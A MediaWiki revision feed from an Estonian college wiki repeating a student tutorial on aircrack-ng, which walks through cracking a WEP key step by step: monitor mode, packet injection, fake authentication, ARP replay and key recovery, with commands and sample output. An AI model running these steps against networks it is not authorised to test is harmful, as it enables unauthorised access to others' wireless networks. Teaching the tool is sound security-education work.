&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89298</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89298"/>
		<updated>2015-05-25T19:24:29Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89297</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89297"/>
		<updated>2015-05-25T19:24:04Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
